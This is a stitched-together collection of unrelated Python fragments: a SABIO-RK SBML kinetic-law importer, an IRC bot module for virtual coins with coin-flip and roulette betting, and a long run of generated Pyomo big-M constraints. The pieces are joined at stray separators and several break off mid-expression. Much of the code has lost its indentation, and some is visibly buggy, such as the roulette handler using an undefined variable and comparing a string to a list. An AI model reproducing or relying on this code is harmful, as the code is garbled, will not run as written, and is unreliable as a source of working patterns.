name, is_wildtype, variant = self.parse_enzyme_name(sbml.getName())
properties = {'is_wildtype': is_wildtype, 'variant': variant, 'modifier_type': modifier_type}
query = self.session.query(Enzyme).filter_by(id=id)
if query.count():
specie = query.first()
else:
specie = Enzyme()
self.session.add(specie)
else:
raise ValueError('Unsupported species type: {}'.format(type))
# set properties
specie.id = id
if specie.name is None:
specie.name = name
elif specie.name != name:
specie._is_name_ambiguous = True
# cross references
cross_references = self.create_cross_references_from_sbml(sbml)
if type == 'SPC':
specie.cross_references = cross_references
elif type == 'ENZ':
specie.subunits = []
specie.cross_references = []
for cross_reference in cross_references:
if cross_reference.namespace == 'uniprot':
specie.subunits.append(EnzymeSubunit(cross_references=[cross_reference]))
else:
specie.cross_references.append(cross_reference)
# updated
specie.modified = datetime.datetime.utcnow()
return (specie, properties)
def parse_enzyme_name(self, sbml):
    """ Parse an SBML enzyme name into the enzyme name, wild type status, and
    variant description it contains.

    Args:
        sbml (:obj:`str`): enzyme name in SBML

    Returns:
        :obj:`tuple`:

            * :obj:`str`: name
            * :obj:`bool`: if :obj:`True`, the enzyme is wild type
            * :obj:`str`: variant

    Raises:
        :obj:`ValueError`: if the enzyme name is in an unsupported format
    """
    # Form 1: "<name>(Enzyme) wildtype|mutant[, <variant>]"
    named = re.match(r'^(.*?)\(Enzyme\) (wildtype|mutant),?(.*?)$', sbml, re.IGNORECASE)
    if named:
        wildtype_flag = named.group(2).lower() == 'wildtype'
        return (named.group(1), wildtype_flag, named.group(3).strip())

    # Form 2: "Enzyme wildtype|mutant[, <name>]" — no variant is recorded here
    anonymous = re.match(r'^Enzyme (wildtype|mutant),?( (.*?))*$', sbml, re.IGNORECASE)
    if anonymous:
        trailing = anonymous.group(3)
        name = trailing.strip() if trailing else None
        return (name, anonymous.group(1).lower() == 'wildtype', None)

    # Form 3: bare "Enzyme -" placeholder, treated as an unnamed wild type
    if re.match(r'^Enzyme - *$', sbml, re.IGNORECASE):
        return (None, True, None)

    raise ValueError('Cannot parse enzyme name: {}'.format(sbml))
def create_kinetic_law_from_sbml(self, id, sbml, specie_properties, functions, units):
    """ Add a kinetic law to the local sqlite database.

    Args:
        id (:obj:`int`): identifier
        sbml (:obj:`libsbml.Reaction`): SBML-representation of a reaction
            (the kinetic law itself is taken from ``sbml.getKineticLaw()``)
        specie_properties (:obj:`dict`): additional properties of the compounds/enzymes

            * `is_wildtype` (:obj:`bool`): indicates if the enzyme is wildtype or mutant
            * `variant` (:obj:`str`): description of the variant of the enzyme
            * `modifier_type` (:obj:`str`): type of the enzyme (e.g. Modifier-Catalyst)

        functions (:obj:`dict` of :obj:`str`: :obj:`str`): dictionary of rate law equations (keys = IDs in SBML, values = equations)
        units (:obj:`dict` of :obj:`str`: :obj:`str`): dictionary of units (keys = IDs in SBML, values = names)

    Returns:
        :obj:`KineticLaw`: kinetic law, or :obj:`None` if the entry is empty

    Raises:
        :obj:`ValueError`: if the annotated ID disagrees with the expected ID,
            or the temperature is expressed in an unsupported unit
    """
    law = sbml.getKineticLaw()
    x_refs = self.create_cross_references_from_sbml(law)
    reaction_x_refs = self.create_cross_references_from_sbml(sbml)
    # stop if kinetic law entry is empty
    if not law.getMetaId():
        return None
    # ID: sanity-check the sabiork.kineticrecord annotation against the caller-supplied id
    annotated_id = next((int(float(x_ref.id)) for x_ref in x_refs if x_ref.namespace == 'sabiork.kineticrecord'), None)
    if annotated_id is not None and annotated_id != id:
        raise ValueError('Annotated ID {} is different from expected ID {}'.format(annotated_id, id))
    # fetch existing row or create a new one, so re-runs update in place
    query = self.session.query(KineticLaw).filter_by(id=id)
    if query.count():
        kinetic_law = query.first()
    else:
        kinetic_law = KineticLaw(id=id)
        self.session.add(kinetic_law)

    """ participants """
    # reactant/product lists are rebuilt from scratch on every (re)load
    kinetic_law.reactants[:] = []
    reactants = sbml.getListOfReactants()
    for i_part in range(reactants.size()):
        part_sbml = reactants.get(i_part)
        compound, compartment = self.get_specie_reference_from_sbml(part_sbml.getSpecies())
        part = ReactionParticipant(
            compound=compound,
            compartment=compartment,
            coefficient=part_sbml.getStoichiometry())
        self.session.add(part)
        kinetic_law.reactants.append(part)
    kinetic_law.products[:] = []
    products = sbml.getListOfProducts()
    for i_part in range(products.size()):
        part_sbml = products.get(i_part)
        compound, compartment = self.get_specie_reference_from_sbml(part_sbml.getSpecies())
        part = ReactionParticipant(
            compound=compound,
            compartment=compartment,
            coefficient=part_sbml.getStoichiometry())
        self.session.add(part)
        kinetic_law.products.append(part)

    """ cross references """
    # Note: these are stored on KineticLaws rather than under Reactions because this
    # seems to be how SABIO-RK stores the information: two kinetic laws (e.g. 16016 and
    # 28003) can share one reaction (9930) yet carry different EC numbers.
    # NOTE(review): the EC numbers quoted in the original comment were garbled
    # (IP-address-like); verify against SABIO-RK before citing concrete values.
    kinetic_law.cross_references = list(filter(lambda x_ref: x_ref.namespace not in ['taxonomy'], reaction_x_refs))
    # rate_law
    # NOTE(review): assumes the first 5 characters of the meta id are a fixed
    # prefix before the equation key — confirm against the SBML export format.
    kinetic_law.equation = functions[law.getMetaId()[5:]]
    # parameters
    kinetic_law.parameters = []
    params = law.getListOfLocalParameters()
    for i_param in range(params.size()):
        param = params.get(i_param)
        # species-bound parameter ids look like '<name>_(SPC|ENZ)_<id>_<compartment>'
        match = re.match(r'^(.*?)_((SPC|ENZ)_([0-9]+)_(.*?))$', param.getId(), re.IGNORECASE)
        if match:
            observed_name = match.group(1)
            species, compartment = self.get_specie_reference_from_sbml(match.group(2))
            if isinstance(species, Compound):
                compound = species
                enzyme = None
            else:
                compound = None
                enzyme = species
        else:
            # free-standing parameter: keep the raw id as its observed name
            observed_name = param.getId()
            compound = None
            enzyme = None
            compartment = None
        # 'div' is SABIO-RK's encoding of '/' in parameter names
        observed_name = observed_name.replace('div', '/')
        observed_type = param.getSBOTerm()
        observed_units_id = param.getUnits()
        if observed_units_id:
            # translate the unit id to its name when known; keep the raw id otherwise
            if observed_units_id in units:
                observed_units = units[observed_units_id]
            else:
                observed_units = observed_units_id
        else:
            observed_units = None
        observed_value = param.getValue()
        parameter = Parameter(
            compound=compound,
            enzyme=enzyme,
            compartment=compartment,
            observed_name=observed_name,
            observed_type=observed_type,
            observed_value=observed_value,
            observed_units=observed_units,
            modified=datetime.datetime.utcnow(),
        )
        self.session.add(parameter)
        kinetic_law.parameters.append(parameter)
    # modifiers to kinetic law: SPC_* become modifier participants, the ENZ_*
    # modifier becomes the law's enzyme (with wildtype/variant metadata)
    kinetic_law.modifiers[:] = []
    modifiers = sbml.getListOfModifiers()
    for i_modifier in range(modifiers.size()):
        modifier = modifiers.get(i_modifier)
        modifier_id = modifier.getSpecies()
        specie, compartment = self.get_specie_reference_from_sbml(modifier_id)
        type = specie_properties[modifier.getSpecies()]['modifier_type']
        if modifier.getSpecies()[0:3] == 'SPC':
            part = ReactionParticipant(
                compound=specie,
                compartment=compartment,
                type=type,
            )
            self.session.add(part)
            kinetic_law.modifiers.append(part)
        elif modifier_id[0:3] == 'ENZ':
            kinetic_law.enzyme, kinetic_law.enzyme_compartment = self.get_specie_reference_from_sbml(modifier_id)
            kinetic_law.enzyme_type = specie_properties[modifier.getSpecies()]['modifier_type']
            kinetic_law.taxon_wildtype = specie_properties[modifier_id]['is_wildtype']
            kinetic_law.taxon_variant = specie_properties[modifier_id]['variant']
    # taxon
    kinetic_law.taxon = next((int(float(x_ref.id)) for x_ref in reaction_x_refs if x_ref.namespace == 'taxonomy'), None)

    """ conditions """
    conditions = law \
        .getAnnotation() \
        .getChild('sabiork') \
        .getChild('experimentalConditions')
    # temperature
    if conditions.hasChild('temperature'):
        temperature = conditions \
            .getChild('temperature') \
            .getChild('startValueTemperature') \
            .getChild(0) \
            .getCharacters()
        temperature = float(temperature)
        temperature_units = conditions \
            .getChild('temperature') \
            .getChild('temperatureUnit') \
            .getChild(0) \
            .getCharacters()
        # NOTE(review): the second accepted literal is a mojibake of '°C'
        # (wrong-encoding artifact); only Celsius is supported either way.
        if temperature_units not in ['°C', '��C']:
            raise ValueError('Unsupported temperature units: {}'.format(temperature_units))
        kinetic_law.temperature = temperature
    # pH
    if conditions.hasChild('pH'):
        ph = conditions \
            .getChild('pH') \
            .getChild('startValuepH') \
            .getChild(0) \
            .getCharacters()
        kinetic_law.ph = float(ph)
    # media
    if conditions.hasChild('buffer'):
        media = conditions \
            .getChild('buffer') \
            .getChild(0) \
            .getCharacters() \
            .strip()
        kinetic_law.media = media

    """ references """
    # everything except the kinetic record's own identifier is a literature reference
    kinetic_law.references = list(filter(lambda x_ref: x_ref.namespace != 'sabiork.kineticrecord', x_refs))

    """ updated """
    kinetic_law.modified = datetime.datetime.utcnow()
    return kinetic_law
def normalize_kinetic_laws(self, ids):
    """ Normalize the parameter values of the given kinetic laws.

    Args:
        ids (:obj:`list` of :obj:`int`): IDs of the kinetic laws to normalize
    """
    laws = self.session.query(KineticLaw).filter(KineticLaw.id.in_(ids)).all()
    for i_law, law in enumerate(laws):
        # progress line every 100 laws
        if self.verbose and (i_law % 100 == 0):
            print(' Normalizing kinetic law {} of {}'.format(i_law + 1, len(ids)))
        # k_cat conversion needs the enzyme's molecular weight when available
        enzyme_molecular_weight = law.enzyme.molecular_weight if law.enzyme else None
        for param in law.parameters:
            normalized = self.normalize_parameter_value(
                param.observed_name, param.observed_type, param.observed_value,
                param.observed_error, param.observed_units, enzyme_molecular_weight)
            param.name, param.type, param.value, param.error, param.units = normalized
        if self.commit_intermediate_results:
            self.session.commit()
def normalize_parameter_value(self, name, type, value, error, units, enzyme_molecular_weight):
"""
Args:
name (:obj:`str`): parameter name
type (:obj:`int`) parameter type (SBO term id)
value (:obj:`float`): observed value
error (:obj:`float`): observed error
units (:obj:`str`): observed units
enzyme_molecular_weight (:obj:`float`): enzyme molecular weight
Returns:
:obj:`tuple` of :obj:`str`, :obj:`int`, :obj:`float`, :obj:`float`, :obj:`str`: normalized name and
its type (SBO term), value, error, and units
Raises:
:obj:`ValueError`: if :obj:`units` is not a supported unit of :obj:`type`
"""
if type not in Parameter.TYPES:
return (None, None, None, None, None)
if value is None:
return (None, None, None, None, None)
type_name = Parameter.TYPES[type]
if type_name == 'k_cat':
if units in ['s^(-1)', 'mol*s^(-1)*mol^(-1)']:
return ('k_cat', 25, value, error, 's^(-1)')
if units in ['katal', 'katal_base']:
# cannot be converted without knowing the enzyme amount in the measurement
return (None, None, None, None, None)
if units in ['M^(-1)*s^(-1)']:
# off by mol^(2) * liter^(-1)
return (None, None, None, None, None)
if units in ['s^(-1)*g^(-1)', 'mol*s^(-1)*g^(-1)', 'M']:
return (None, None, None, None, None)
if units is None:
return (None, None, None, None, None)
elif type_name == 'k_m':
if units in ['M']:
return ('k_m', 27, value, error, 'M')
if units in ['mol']:
# off by liter^(-1)
return (None, None, None, None, None)
if units in ['mg/ml', 'M^2', 'mol/mol', 'katal*g^(-1)', 's^(-1)', 'mol*s^(-1)*g^(-1)',
'l*g^(-1)*s^(-1)', 'M^(-1)*s^(-1)', 'M^(-1)']:
return (None, None, None, None, None)
if units is None:
return (None, None, None, None, None)
elif type_name == 'v_max':
if units in ['mol*s^(-1)*g^(-1)', 'katal*g^(-1)']:
if enzyme_molecular_weight:
f = enzyme_molecular_weight
return ('k_cat', 25, value * float(f) if value else None, error * | |
# modules/coins.py (from dngfx/MagicBot)
# --depends-on commands
# --depends-on permissions
import datetime, decimal, functools, math, random, re, time
from src import ModuleManager, utils

# Coin-flip sides mapped to indices.
SIDES = {"heads": 0, "tails": 1}
DEFAULT_REDEEM_DELAY = 150  # seconds (2.5 minutes); old comment wrongly said 300s
DEFAULT_REDEEM_AMOUNT = 10000
DECIMAL_ZERO = 0  # Just in case.
BET_MINIMUM = 1
HOUR_SECONDS = (1 * 60) * 60
LOTTERY_INTERVAL = (60 * 60) * 6  # 6 hours
LOTTERY_BUYIN = 100
# European roulette layout: pocket colours and the standard table groupings.
RED = [1, 3, 5, 7, 9, 12, 14, 16, 18, 19, 21, 23, 25, 27, 30, 32, 34, 36]
BLACK = [2, 4, 6, 8, 10, 11, 13, 15, 17, 20, 22, 24, 26, 28, 29, 31, 33, 35]
SMALL = range(1, 19)
BIG = range(19, 37)
FIRST_DOZEN = list(range(1, 13))
SECOND_DOZEN = list(range(13, 25))
THIRD_DOZEN = list(range(25, 37))
FIRST_COLUMN = list(range(1, 37))[0::3]
SECOND_COLUMN = list(range(1, 37))[1::3]
THIRD_COLUMN = list(range(1, 37))[2::3]
# Bet-name patterns: street<1-12>, 2street<1-11>, and [l|r]corner<1-11>.
REGEX_STREET = re.compile("street([1-9]|1[0-2])$")
REGEX_DOUBLESTREET = re.compile("2street([1-9]|1[0-1])$")
REGEX_CORNER = re.compile("([lr])corner([1-9]|1[0-1])$")
class CoinParseException(Exception):
    """Exception type for coin-amount parsing failures."""
    # NOTE(review): not raised anywhere in this chunk — presumably used
    # elsewhere or kept for API compatibility; confirm before removing.
    pass
class Module(ModuleManager.BaseModule):
def _coin_spec_parse(self, word):
if isinstance(word, str) and word.isdigit():
return int(word)
if isinstance(word, int):
if word >= DECIMAL_ZERO:
return word
else:
raise utils.parse.SpecTypeError("Please provide a positive coin amount")
raise utils.parse.SpecTypeError("Please provide a valid coin amount")
@utils.export("command-spec.coins")
def _coins_spec(self, server, channel, user, args):
    """Command-spec parser: one coin amount argument, consuming one token."""
    if not args:
        raise utils.parse.SpecTypeError("No coin amount provided")
    return self._coin_spec_parse(args[0]), 1
@utils.export("command-spec.coinsmany")
def _coins_many_spec(self, server, channel, user, args):
    """Command-spec parser: parse every argument as a coin amount (None if empty)."""
    amounts = [self._coin_spec_parse(arg) for arg in args]
    return (amounts or None), 1
def _until_next_hour(self, now=None):
now = now or datetime.datetime.utcnow()
until_next_hour = 60 - now.second
return until_next_hour + ((60 - (now.minute + 1)) * 60)
def _until_next_6_hour(self):
    """Return the number of seconds until the next 6-hour boundary (UTC)."""
    now = datetime.datetime.utcnow()
    seconds_to_hour = self._until_next_hour(now)
    # whole hours remaining after the current (partial) hour completes
    whole_hours_left = (6 - (now.hour % 6)) - 1
    return seconds_to_hour + whole_hours_left * HOUR_SECONDS
def _get_user_coins(self, user):
    # Balance is stored in the per-user "coins" setting; default 0.
    return user.get_setting("coins", 0)
def _set_user_coins(self, user, coins):
    # Persist the new balance in the per-user "coins" setting.
    user.set_setting("coins", coins)
def _all_coins(self, server):
all_coins = server.get_all_user_settings("coins", [])
for i, (nickname, coins) in enumerate(all_coins):
all_coins[i] = (nickname, coins)
return dict(filter(lambda coin: coin[1], all_coins))
def _redeem_amount(self, server):
    # Per-server override of the free-redeem amount.
    # NOTE(review): coerced to int here but _redeem_delay is not — presumably
    # settings can come back as strings; confirm the settings store's types.
    return int(server.get_setting("redeem-amount", DEFAULT_REDEEM_AMOUNT))
def _redeem_delay(self, server):
    # Per-server override of the redeem cooldown (seconds).
    # NOTE(review): not int()-coerced, unlike _redeem_amount — verify whether
    # that asymmetry is intentional.
    return server.get_setting("redeem-delay", DEFAULT_REDEEM_DELAY)
def _give(self, server, user, amount):
    """Credit *amount* coins to *user* and return the resulting balance."""
    new_total = amount + int(self._get_user_coins(user))
    self._set_user_coins(user, new_total)
    return new_total
def _take(self, server, user, amount):
    """Debit *amount* coins from *user* and return the resulting balance."""
    remaining = self._get_user_coins(user) - amount
    self._set_user_coins(user, remaining)
    return remaining
def _move(self, user1, user2, amount):
    """Transfer *amount* coins from *user1* to *user2* (no balance checks here)."""
    self._set_user_coins(user1, self._get_user_coins(user1) - amount)
    self._set_user_coins(user2, self._get_user_coins(user2) + amount)
def _coin_str(self, coins):
    # Comma-group a coin amount for display (identical to _coin_str_human).
    return utils.parse.comma_format(coins)
def _coin_str_human(self, coins):
    # NOTE(review): byte-for-byte duplicate of _coin_str — kept as a separate
    # hook, presumably so "human" formatting can diverge later; confirm.
    return utils.parse.comma_format(coins)
@utils.hook("received.command.coins")
@utils.kwarg("help", "Show how many coins you have")
def coins(self, event):
    """Report the coin balance of the calling user, or of a named target."""
    args = event["args_split"]
    target = event["server"].get_user(args[0]) if args else event["user"]
    balance = self._get_user_coins(target)
    plural = "" if balance == 1 else "s"
    event["stdout"].write(
        "%s has %s coin%s"
        % (target.nickname, self._coin_str_human(balance), plural)
    )
@utils.hook("received.command.resetcoins")
@utils.kwarg("help", "Reset a user's coins to 0")
@utils.kwarg("permission", "reset-coins")
@utils.spec("!<nickname>ouser")
def reset_coins(self, event):
    """Zero out a user's balance (requires the reset-coins permission)."""
    nickname = event["args_split"][0]
    target = event["server"].get_user(nickname)
    self._set_user_coins(target, 0)
    event["stdout"].write("Reset coins for %s" % target.nickname)
@utils.hook("received.command.givecoins")
@utils.kwarg("help", "Create coins and give them to a user")
@utils.kwarg("permission", "give-coins")
@utils.spec("!<nickname>ouser !<amount>coins")
def give_coins(self, event):
    """Mint new coins and credit them to the named user (admin command)."""
    recipient = event["server"].get_user(event["args_split"][0])
    amount = int(event["args_split"][1])
    self._give(event["server"], recipient, amount)
    event["stdout"].write(
        "Gave '%s' %s coins" % (recipient.nickname, self._coin_str(amount))
    )
@utils.hook("received.command.richest")
@utils.spec("!-channelonly")
@utils.kwarg("help", "Show the top 10 richest users")
def richest(self, event):
    """List the ten users holding the most coins on this server."""
    server = event["server"]
    leaderboard = utils.top_10(
        self._all_coins(server),
        convert_key=lambda nickname: server.get_user(nickname).nickname,
        value_format=self._coin_str_human,
    )
    event["stdout"].write("Richest users: %s" % ", ".join(leaderboard))
def _redeem_cache(self, server, user):
return "redeem|%s|%s@%s" % (server.id, user.username, user.hostname)
@utils.hook("received.command.redeemcoins")
@utils.kwarg("help", "Redeem your free coins")
def redeem_coins(self, event):
    """Grant the free redeem amount — only to users with zero coins, and at
    most once per redeem-delay window (tracked via a temporary cache entry)."""
    user = event["user"]
    if self._get_user_coins(user) != 0:
        event["stderr"].write(
            "%s: You can only redeem coins when you have none" % user.nickname
        )
        return
    cache = self._redeem_cache(event["server"], user)
    if self.bot.cache.has_item(cache):
        # still inside the cooldown window
        time_left = self.bot.cache.until_expiration(cache)
        event["stderr"].write(
            "%s: Please wait %s before redeeming"
            % (
                user.nickname,
                utils.datetime.format.to_pretty_until(time_left),
            )
        )
        return
    redeem_amount = self._redeem_amount(event["server"])
    self._give(event["server"], user, redeem_amount)
    event["stdout"].write(
        "%s: redeemed %s coins"
        % (user.nickname, self._coin_str(redeem_amount))
    )
    redeem_delay = self._redeem_delay(event["server"])
    self.bot.cache.temporary_cache(cache, True, redeem_delay)
@utils.hook("received.command.flip")
@utils.kwarg("help", "Bet on a coin flip")
@utils.kwarg("authenticated", True)
@utils.spec("!'heads,tails !'all")
@utils.spec("!'heads,tails !<amount>coins")
def flip(self, event):
    """Bet on a coin flip: a correct call wins the stake, a wrong one loses it.

    The stake is either a concrete amount (validated by the coins spec) or
    the literal "all", meaning the user's entire balance.
    """
    side_name = event["spec"][0]
    coin_bet = event["spec"][1]
    if isinstance(coin_bet, str) and coin_bet != "all":
        # unrecognised string argument from the spec; nothing to do
        return
    user_coins = self._get_user_coins(event["user"])
    if coin_bet == "all":
        # bet the whole balance (no need to re-read the setting)
        coin_bet = user_coins
        if coin_bet <= 0:
            raise utils.EventError(
                "%s: You have no coins to bet" % event["user"].nickname
            )
    if coin_bet < 0:
        # Defensive check; the coins spec already rejects negative amounts.
        # BUG FIX: this message was previously built with a comma instead of
        # %-interpolation, so EventError got an unformatted string + extra arg.
        raise utils.EventError(
            "%s: You cant bet less than 0 coins" % event["user"].nickname
        )
    if coin_bet > user_coins:
        raise utils.EventError(
            "%s: You don't have enough coins to bet" % event["user"].nickname
        )
    chosen_side = random.SystemRandom().choice(list(SIDES.keys()))
    win = side_name == chosen_side
    coin_bet_str = self._coin_str_human(coin_bet)
    if win:
        new_total = self._give(event["server"], event["user"], coin_bet)
    else:
        # _take returns the post-deduction balance
        new_total = self._take(event["server"], event["user"], coin_bet)
    event["stdout"].write(
        "%s flips %s and %s %s coin%s! (new total: %s)"
        % (
            event["user"].nickname,
            side_name,
            "wins" if win else "loses",
            coin_bet_str,
            "" if coin_bet == 1 else "s",
            self._coin_str_human(new_total),
        )
    )
@utils.hook("received.command.sendcoins")
@utils.kwarg("help", "Send coins to another user")
@utils.kwarg("authenticated", True)
@utils.spec("!<nickname>ouser !<amount>coins")
def send(self, event):
    """Transfer coins to another user.

    The sender must keep at least the server's redeem amount after the
    transfer, so balances cannot be drained below the free-redeem floor.
    (Removed an unused fetch of the recipient's balance and a duplicate
    fetch of the sender's balance.)
    """
    sender = event["user"]
    target_user = event["spec"][0]
    if sender.get_id() == target_user.get_id():
        raise utils.EventError(
            "%s: You can't send coins to yourself" % sender.nickname
        )
    send_amount = event["spec"][1]
    user_coins = self._get_user_coins(sender)
    redeem_amount = self._redeem_amount(event["server"])
    if user_coins == 0:
        raise utils.EventError("%s: You have no coins" % sender.nickname)
    if user_coins - send_amount < redeem_amount:
        raise utils.EventError(
            "%s: You cannot send an amount of money that puts"
            " you below %s coins"
            % (sender.nickname, self._coin_str(redeem_amount))
        )
    self._move(sender, target_user, send_amount)
    event["stdout"].write(
        "%s sent %s coins to %s"
        % (
            sender.nickname,
            self._coin_str(send_amount),
            target_user.nickname,
        )
    )
def _double_street(self, i):
return (i * 3) - 2, (i * 3) + 3
@utils.hook("received.command.roulette")
@utils.kwarg("help", "Spin a roulette wheel")
@utils.kwarg("authenticated", True)
@utils.spec("!<types>word !'all")
@utils.spec("!<types>word !<amounts>coinsmany")
def roulette(self, event):
bets = event["spec"][0].lower().split(",")
if not len(bets) <= len(event["spec"][1]):
raise utils.EventError(
"%s: Please provide an amount for each bet" % event["user"].nickname
)
if "0" == bets:
raise utils.EventError("%s: You can't bet on 0" % event["user"].nickname)
bet_amounts = []
if event["spec"][1] == "all":
all_coins = self._get_user_coins(event["user"])
if all_coins <= 0:
all_coins = self._set_user_coins(event["user"], 0)
raise utils.EventError(
"%s: You have no coins to bet" % event["user"].nickname
)
bet_amounts = [all_coins]
else:
bet_amounts = event["spec"][1]
bet_amount_total = sum(all_coins)
user_coins = self._get_user_coins(event["user"])
if bet_amount_total > user_coins:
raise utils.EventError(
"%s: You don't have enough coins to bet" % event["user"].nickname
)
# black, red, odds, evens, low (1-18), high (19-36)
# 1dozen (1-12), 2dozen (13-24), 3dozen (25-36)
# 1column (1,4..34), 2column (2,5..35), 3column (3,6..36)
choice = random.SystemRandom().randint(0, 36)
winnings = {}
losses = {}
if choice == 0:
event["stdout"].write(
"Roulette spin lands on 0, "
"the house wins, %s loses %s"
% (event["user"].nickname, self._coin_str_human(bet_amount_total))
)
self._take(event["server"], event["user"], bet_amount_total)
return
colour = "red" if choice in RED else "black"
for i, bet in enumerate(bets):
street_match = REGEX_STREET.match(bet)
doublestreet_match = REGEX_DOUBLESTREET.match(bet)
corner_match = REGEX_CORNER.match(bet)
odds = 0
if bet == "even":
odds = 1 * ((choice % 2) == 0)
elif bet == "odd":
odds = 1 * ((choice % 2) == 1)
elif bet == "red":
odds = 1 * (choice in RED)
elif bet == "black":
odds = 1 * (choice in BLACK)
elif bet == "small" or bet == "low":
odds = 1 * (choice in SMALL)
elif bet == "big" or bet == "high":
odds = 1 * (choice in BIG)
elif bet == "dozen1":
odds = 2 * (choice in FIRST_DOZEN)
elif bet == "dozen2":
odds = 2 * (choice in SECOND_DOZEN)
elif bet == "dozen3":
odds = 2 * (choice in THIRD_DOZEN)
elif bet == "column1":
odds = 2 * (choice in FIRST_COLUMN)
elif bet == "column2":
odds = 2 * (choice in SECOND_COLUMN)
elif bet == "column3":
odds = 2 * (choice in THIRD_COLUMN)
elif street_match:
row = int(street_match.group(1))
odds = 11 * (((row * 3) - 2) <= choice <= (row * 3))
elif doublestreet_match:
row = int(doublestreet_match.group(1))
min_num, max_num = self._double_street(row)
odds = 5 * (min_num <= choice <= max_num)
elif corner_match:
row = int(corner_match.group(2))
min_num, max_num = self._double_street(row)
numbers = list(range(min_num, max_num + 1))
if corner_match.group(1) == "l":
numbers = numbers[:2] + numbers[3:5]
else:
numbers = numbers[1:3] + numbers[-2:]
odds = 8 * (choice in numbers)
elif bet.isdigit() and (1 <= int(bet) <= 36):
odds = 35 * (choice == int(bet))
else:
| |
Constraint(expr= m.x6661 - 320*m.b7092 <= 0)
# Machine-generated big-M linking constraints: each forces a continuous
# variable m.x#### to 0 unless its indicator binary m.b#### is 1, with the
# big-M coefficient (320, 330, 340, ...) acting as the upper bound.
# Do not edit by hand — regenerate from the model source instead.
m.c5129 = Constraint(expr= m.x6662 - 320*m.b7093 <= 0)
m.c5130 = Constraint(expr= m.x6663 - 320*m.b7091 <= 0)
m.c5131 = Constraint(expr= m.x6664 - 320*m.b7092 <= 0)
m.c5132 = Constraint(expr= m.x6665 - 320*m.b7093 <= 0)
# bound 330 on x6634..x6649
m.c5133 = Constraint(expr= m.x6634 - 330*m.b7070 <= 0)
m.c5134 = Constraint(expr= m.x6635 - 330*m.b7074 <= 0)
m.c5135 = Constraint(expr= m.x6636 - 330*m.b7073 <= 0)
m.c5136 = Constraint(expr= m.x6637 - 330*m.b7074 <= 0)
m.c5137 = Constraint(expr= m.x6638 - 330*m.b7078 <= 0)
m.c5138 = Constraint(expr= m.x6639 - 330*m.b7077 <= 0)
m.c5139 = Constraint(expr= m.x6640 - 330*m.b7078 <= 0)
m.c5140 = Constraint(expr= m.x6641 - 330*m.b7076 <= 0)
m.c5141 = Constraint(expr= m.x6642 - 330*m.b7077 <= 0)
m.c5142 = Constraint(expr= m.x6643 - 330*m.b7078 <= 0)
m.c5143 = Constraint(expr= m.x6644 - 330*m.b7081 <= 0)
m.c5144 = Constraint(expr= m.x6645 - 330*m.b7080 <= 0)
m.c5145 = Constraint(expr= m.x6646 - 330*m.b7081 <= 0)
m.c5146 = Constraint(expr= m.x6647 - 330*m.b7079 <= 0)
m.c5147 = Constraint(expr= m.x6648 - 330*m.b7080 <= 0)
m.c5148 = Constraint(expr= m.x6649 - 330*m.b7081 <= 0)
# bound 340 on x6650..x6665
m.c5149 = Constraint(expr= m.x6650 - 340*m.b7082 <= 0)
m.c5150 = Constraint(expr= m.x6651 - 340*m.b7086 <= 0)
m.c5151 = Constraint(expr= m.x6652 - 340*m.b7085 <= 0)
m.c5152 = Constraint(expr= m.x6653 - 340*m.b7086 <= 0)
m.c5153 = Constraint(expr= m.x6654 - 340*m.b7090 <= 0)
m.c5154 = Constraint(expr= m.x6655 - 340*m.b7089 <= 0)
m.c5155 = Constraint(expr= m.x6656 - 340*m.b7090 <= 0)
m.c5156 = Constraint(expr= m.x6657 - 340*m.b7088 <= 0)
m.c5157 = Constraint(expr= m.x6658 - 340*m.b7089 <= 0)
m.c5158 = Constraint(expr= m.x6659 - 340*m.b7090 <= 0)
m.c5159 = Constraint(expr= m.x6660 - 340*m.b7093 <= 0)
m.c5160 = Constraint(expr= m.x6661 - 340*m.b7092 <= 0)
m.c5161 = Constraint(expr= m.x6662 - 340*m.b7093 <= 0)
m.c5162 = Constraint(expr= m.x6663 - 340*m.b7091 <= 0)
m.c5163 = Constraint(expr= m.x6664 - 340*m.b7092 <= 0)
m.c5164 = Constraint(expr= m.x6665 - 340*m.b7093 <= 0)
# bound 355 on x6650..x6665
m.c5165 = Constraint(expr= m.x6650 - 355*m.b7082 <= 0)
m.c5166 = Constraint(expr= m.x6651 - 355*m.b7086 <= 0)
m.c5167 = Constraint(expr= m.x6652 - 355*m.b7085 <= 0)
m.c5168 = Constraint(expr= m.x6653 - 355*m.b7086 <= 0)
m.c5169 = Constraint(expr= m.x6654 - 355*m.b7090 <= 0)
m.c5170 = Constraint(expr= m.x6655 - 355*m.b7089 <= 0)
m.c5171 = Constraint(expr= m.x6656 - 355*m.b7090 <= 0)
m.c5172 = Constraint(expr= m.x6657 - 355*m.b7088 <= 0)
m.c5173 = Constraint(expr= m.x6658 - 355*m.b7089 <= 0)
m.c5174 = Constraint(expr= m.x6659 - 355*m.b7090 <= 0)
m.c5175 = Constraint(expr= m.x6660 - 355*m.b7093 <= 0)
m.c5176 = Constraint(expr= m.x6661 - 355*m.b7092 <= 0)
m.c5177 = Constraint(expr= m.x6662 - 355*m.b7093 <= 0)
m.c5178 = Constraint(expr= m.x6663 - 355*m.b7091 <= 0)
m.c5179 = Constraint(expr= m.x6664 - 355*m.b7092 <= 0)
m.c5180 = Constraint(expr= m.x6665 - 355*m.b7093 <= 0)
# bound 360 on x6650..x6665
m.c5181 = Constraint(expr= m.x6650 - 360*m.b7082 <= 0)
m.c5182 = Constraint(expr= m.x6651 - 360*m.b7086 <= 0)
m.c5183 = Constraint(expr= m.x6652 - 360*m.b7085 <= 0)
m.c5184 = Constraint(expr= m.x6653 - 360*m.b7086 <= 0)
m.c5185 = Constraint(expr= m.x6654 - 360*m.b7090 <= 0)
m.c5186 = Constraint(expr= m.x6655 - 360*m.b7089 <= 0)
m.c5187 = Constraint(expr= m.x6656 - 360*m.b7090 <= 0)
m.c5188 = Constraint(expr= m.x6657 - 360*m.b7088 <= 0)
m.c5189 = Constraint(expr= m.x6658 - 360*m.b7089 <= 0)
m.c5190 = Constraint(expr= m.x6659 - 360*m.b7090 <= 0)
m.c5191 = Constraint(expr= m.x6660 - 360*m.b7093 <= 0)
m.c5192 = Constraint(expr= m.x6661 - 360*m.b7092 <= 0)
m.c5193 = Constraint(expr= m.x6662 - 360*m.b7093 <= 0)
m.c5194 = Constraint(expr= m.x6663 - 360*m.b7091 <= 0)
m.c5195 = Constraint(expr= m.x6664 - 360*m.b7092 <= 0)
m.c5196 = Constraint(expr= m.x6665 - 360*m.b7093 <= 0)
# bound 360 on x6666..x6681
m.c5197 = Constraint(expr= m.x6666 - 360*m.b7094 <= 0)
